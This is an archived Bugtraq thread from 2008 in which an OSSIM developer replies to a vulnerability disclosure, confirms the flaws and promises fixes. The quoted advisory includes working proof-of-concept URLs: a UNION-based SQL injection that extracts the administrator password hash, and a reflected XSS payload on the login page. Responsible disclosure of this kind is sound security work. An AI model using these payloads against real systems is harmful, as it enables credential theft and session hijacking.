Bugtraq mailing list archives
Re: SQL-injection, XSS in OSSIM (Open Source Security Information Management)
From: Dominique Karg <dk () ossim net>
Date: Fri, 22 Feb 2008 08:50:52 +0100
Hello,I can confirm this affecting earlier versions as well, the XSS has been fixed some months ago, the SQL Injection (and others) were caused by a failure in the "punctuation" validation regexp. Just fixed that one as well as some others.
We're going to release a fixed version asap after stopping development in order to get a throughout security audit done. The SQL regexp I just fixed and we'll update the packages today.
Nonetheless, exposure should be minimal since:a) You aren't going to provide public access to your SIM console, aren't you ? b) Regarding the specific SQL injection mentioned in here (as said, there are more we're going to fix), you shouldn't give access to the policy section to normal users either.
I must thank you for pointing this out but would've appreciate a more "direct" contact, as it is considered a polite way of releasing bugs.
Greetings, Dominique Am 21.02.2008 um 13:47 schrieb marcin.kopec () hotmail com:
Application: OSSIM http://www.ossim.net Version: 0.9.9rc5Note: it is possible that the problem affects also earlier OSSIM versionsPlatforms: Linux Bug: SQL injection, Cross Site Scripting Exploitation: remote Date: 21 Feb 2008 Author: Marcin Kopec E-mail: marcin(dot)kopec(at)hotmail(dot)com --------------------------------------- 1) IntroductionOSSIM it's a free implementation of Security Information Management (SIM) system, equipped with many useful security tools (nessus, snort, p0f, ntop, ...) managed from easy-to-use web panel.2) SQL injection The bug exist in portname parameter of modifyportform.phpIt's possible to obtain hashed administrator password when user have rights to do port modification in "PORTS" tab.http://[host]/ossim/port/modifyportform.php?portname=ANY'%20and %201=2%20union%20select%20pass,2%20from%20ossim.users%20where %20login='admin3) XSS Quotes in OSSIM aren't property sanitized. Below XSS may be executed without logging into the OSSIM.http://[host]/ossim/session/login.php?dest=%22%3E%3Cscript %3Ealert(document.cookie)%3C/script%3E%3C!--
Current thread:
- SQL-injection, XSS in OSSIM (Open Source Security Information Management) marcin . kopec (Feb 21)
- Re: SQL-injection, XSS in OSSIM (Open Source Security Information Management) Dominique Karg (Feb 22)
- <Possible follow-ups>
- Re: Re: SQL-injection, XSS in OSSIM (Open Source Security Information Management) dcid (Feb 25)